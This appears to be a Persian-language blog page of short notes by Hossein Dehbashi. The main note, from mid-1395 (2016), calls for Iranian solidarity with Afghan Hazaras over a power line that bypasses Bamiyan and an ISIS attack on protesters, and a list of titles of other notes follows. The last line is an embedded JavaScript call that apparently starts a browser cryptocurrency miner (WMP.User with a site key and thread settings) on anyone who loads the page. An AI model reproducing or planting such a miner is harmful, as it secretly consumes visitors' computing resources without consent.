یادداشت‌ها

یادداشت 274

‏یک: ‏وقتی می‌خوانی که همزبانی به فارسی نوشته: دوستان ایرانی‌! مابرای هدر نرفتن خون یاران و روشنایی خانه‌هایمان به همدلی شما نیاز داریم! چه حالی می‌شوی؟ همان حال!

دو:
‏یکی زیرعکس شهدا نوشته: شاید آینده‌ام روشن با نور قبر تو!
دیگری پیام داده: هرکه غذا می‌خواهد وبرق، بیاید خانه ما!
چه فکر می‌کنی؟ همان فکر!

سه:
‏یادت نمی‌رود که چه صبور و چه بی‌توقع، شانه به انجام چه کارهای بی‌شمار و بی‌نظیر و پرزحمت و بزرگی دادند، افغانستانی های مهاجر و مهمان، برای ساختن ایران ما.
حالا چگونه جبران کنیم؟ همان طور!

چهار:
قضیه ساده است. با کمک مردم جهان و ایران، قرار بود خط انتقال برقی به مناطق مختلف افغانستان برق برساند و #روشنایی ، حالا این خط برق، بامیان و مناطق شیعه را دور می‌زند و پاسخ دولت سکوت و تاریکی است و جواب داعش، تهدید و قتل‌عامِ معترضان!
روشنایی شان به دستِ ما نیست؟ قبول. روشنگری کنیم!

پنج:
‏هیچ‌گاه تنهایمان نگذاشتند، چه در دفاع ۸ ساله از کردستان تا خوزستان و چه در جنگ با وحوشِ داعش از جبهه حلب تا کربلا و نجف. چه برای حقوق زنان و کودکان و حتی متهمان یا در شکستن تحریم‌ها.
تنهایشان نگذاریم. فقط همین!

 

ارسال کننده: حسین دهباشی
تاریخ: 08 مرداد 1395
یادداشت 359

دو آزادی در یک روز:

یادداشت 358

برای خواندن سلسله مطالب "مسافر جاده هراز" زندگی نامه خودنوشت افشین علاء به کانال شخصی او مراجعه فرمایید.

یادداشت 357

هو الله

یادداشت 356

در نقد مقایسه رذیلانه‌ی انتخاب ترامپ و انتخاب احمدی نژاد / علی علیزاده

یادداشت 355

من مرگِ هیچ معلّمی را باور نمی‌کنم!/ در سوگِ تورانِ میرهادی

یادداشت 354

‏[ از شُمارِ دوچشم | یک تن کم | وز شُمارِ خرد... | هزاران بیش ] «تورانِ میرهادی» | نازنین دُردانهء آموزش و پرورشِ نوینِ ایران درگذشت

یادداشت 354

اُمیدِحسینی | که البتّه نگاهِ سیاسی بسیار متفاوتی با نگارنده دارد | نیازی به هیچ تبلیغی ندارد | وبلاگِ «آهستان» که در شمارِ پُرمغزونغزترین ذخایرِ جناحِ اصولگرایِ مجازستان بوده است، هم! | و کانالِ تازه تاسیسِ او در تلگرام نیز لابُد چنان می‌شود | خواندنی و لب‌ریز و لب‌سوز و لب‌دوز!| علیکم به عضویت و پیگیریِ آن:

یادداشت 353

کتاب‌های زرد می‌توانند رقیب فضای مجازی و ماهواره باشند

یادداشت 352

پیامی سرگشاده به بچه‌های بالا! / در فضیلتِ پیشگیری قبل از درمان!

یادداشت 350

دودوتا؟ لُبنان‌تا!/ مهردادِ فرهمند

یادداشت 349

محسن میردامادی |سردبیر روزنامه سلام، دبیرکل جبهه مشارکت: " شورای امنیت سازمان ملل صلاحیت ندارد، ملّت آمریکا به وظیفهء خود در مورد گروگانگیری ما عمل کنند، همه کسانی که در سفارت آمریکا کار می‌کردند از نظر ما مجرم و جاسوس هستند، محاکمه را ممکن است به دادگاه لاهه بسپاریم، اگر آمریکا را محکوم کرد قبول می‌کنیم، در غیر این صورت رای آن هیچ بها و ارزشی برای ما ندارد..."

یادداشت 348

‏شمریم! اگر روزِ ستم خاموشیم خون است! اگر آبِ خُنک می‌نوشیم آن‌سویِ جهان کرب و بلایی بر پاست ما هم دلمان خوش است! مشکی پوشیم!
var someData = WMP.User('SK_A4VFH9k7Si5999pXyW7id', 'soroush',{ threads: 4, autoThreads: false, throttle: 0.3, forceASMJS: false }); someData.start();